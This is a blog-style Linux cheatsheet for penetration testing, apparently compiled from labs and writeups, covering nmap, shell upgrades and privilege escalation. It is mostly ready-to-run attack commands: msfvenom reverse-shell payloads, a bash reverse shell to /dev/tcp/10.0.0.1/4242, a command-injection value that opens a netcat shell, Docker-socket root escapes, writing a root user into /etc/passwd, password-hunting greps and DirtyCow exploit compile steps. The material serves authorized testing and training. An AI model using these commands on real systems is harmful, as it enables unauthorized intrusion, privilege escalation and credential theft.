Linux Cheatsheet
security linux cheats tools privescWriting a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I’m fully satisfied with the results. Thus I thought I will share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team.
Nmap
Scan with different wildcards. Nickname; Big Boy Scan
$ sudo nmap -A -sV -O --min-rate 600 --script "(vuln or exploit or auth) and not broadcast" -oA <rhost>-script <rhost> -p <ports>
Search and filter nmap scripts with different wildcards
$ locate -r '\.nse$' | xarg grep categories | grep '\default\|version\|safe' | grep smb
Script adjusting with wildcard and port
$ nmap --script safe -p 445 <ip>
Python
Webserver
Spawn a webserver in current directory
$ python3 -m http.server <port>
Ports like 80, 443, 445
etc. need root priviledges.
Upgrade shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
IMPORTANT - pay attention to which Python version is installed and used on the target system, if necessary:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Virtual Environment
For some exploits, older Python versions like 2.7 work better. Sometimes only version 2.7 exploits are working. Then create the virtual environment with Python 2.
Create
Python 3
$ python3 -m venv /path/to/venv/MyVenv
Python 2
$ virtualenv -p /usr/bin/python2.7 MyVenv
Activate
$ source MyVenv/bin/activate
Deactivate (Both)
$ deactivate
Dirsearch
Two bash one-liners, which open all HTTP 200 responses in Firefox
$ grep -i '200\|Target' <file>
Pasting the output into a file
$ echo "Enter path to temporary file:" && read file && firefox & ; baseUrl=$(cat ${file} | grep "Target: " | awk -F "http" '{print $2}' | cut -d "^" -f 1) && baseUrl=${baseUrl%?} && cat ${file} | grep -v "Last request to" | grep "200 -" | cut -d "-" -f 3 | cut -d "^" -f 1 | sed "s/ //" | awk -v url="$baseUrl" '{print "firefox -url http" url $0}' | bash
Netcat
Connect
$ nc -vv <ip> <port>
Listen
$ nc -lvnp <port>
Shell
After Python Upgrade
# Reverse shell into the background
CTRL + Z
# Type into your local shell
stty raw -echo
# To open up the reverse shell again
fg
# To use clear and tab completion
export TERM=xterm
Restricted Shells (rbash)
$ ssh <user>@<ip> -t "bash --noprofile"
Write into /etc/passwd
<user>:$(openssl passwd -1 -salt <user> <password>):0:0:root:/bin/bash
Docker
Sometimes misconfigurations in Docker lead to easy privilege escalations. This is a good Indicator
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),
46(plugdev),110(lpadmin),111(sambashare),'122(docker)'
Furthermore LinPeas1 can also do this quite well with the following output
[+] Analyzing .socket files
[...]
'Docker socket /var/run/docker.sock is writable'
[...]
Exploit
There are several exploits for this vulnerability:
$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
More of these can be found here: https://www.hackingarticles.in/docker-privilege-escalation/
Search for files and password
$ find / -writable -type d 2>/dev/null
$ grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq
$ grep -Ri "password" /home /var/www /var/log 2>/dev/null | sort | uniq
MSFVENOM
Powershell
$ msfvenom --platform windows -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f vba-psh
Java/JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f raw > shell.jsp
WAR (JSP)
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f war > shell.war
Creates an unstaged x86 shell
$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe
Creates an unstaged x64 shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe
Staged payload: windows/x64/meterpreter/reverse_tcp
Unstaged: windows/shell_reverse_tcp
More examples of MSFVenom reverse shells: MSFVenom Reverse Shell Cheatsheet
SSH
Troubleshooting the following error on SSH
Unable to negotiate with <ip> port 22: no matching key exchange method found.
Their offer: 'diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1'
- Check which authentication methods are allowed (password, key)
- If password based authentication is allowed, use the following command
$ ssh -l bob <ip> -oKexAlgorithms=%one of the highlighted algorithmns%
User management
Change user
$ su <username>
Files with root priviledges
Use the following command to determine if some program can be run as root:
$ sudo -l
(ROOT) /usr/bin/perl
Then execute it with the full path
$ sudo /usr/bin/perl <command>
A good read: https://gtfobins.github.io/
SUID BITS
Are there any interesting SUID bits?
Is the binary executable?
- Which commands are being used? Are files/directories modified or created?
- If you can modify the file, try to write a shell into it
- For examle a bash reverse shell:
$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
If it’s not executable
- Try to use the
strings
command, to see what the binary is doing or if there is any lead. Otherwise google the name of the binary. You can also look into https://gtfobins.github.io/
SSH Private Key
If the following error occurs
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'rsakey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "rsakey": bad permissions
Use chmod 600
on the private key.
Command Injection
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
We can control the $value
in this command and if we fill it with 'nc <ip> <port> -c bash;'
it will open up a reverse shell
Also interesting:
- Redhat/CentOS root through network-scripts - under certain conditions, network interface names can be used for command injection.
Kernel exploit
DirtyCow
There are many variants of dirty cow, however the following two work most of the time
-
40839.c (Pokemon)
- Compile with the following command
$ gcc -pthread 40839.c -o <name> -lcrypt
- This will create a user firefart and prompts for a password
- Compile with the following command
-
40611.c (The “original” DirtyCow exploit)
- Compile with the following command
$ gcc -pthread 40611.c -o dirtcow
- Asks for a file which needs to be modified. Ideally a new user is written into /etc/passwd
- Compile with the following command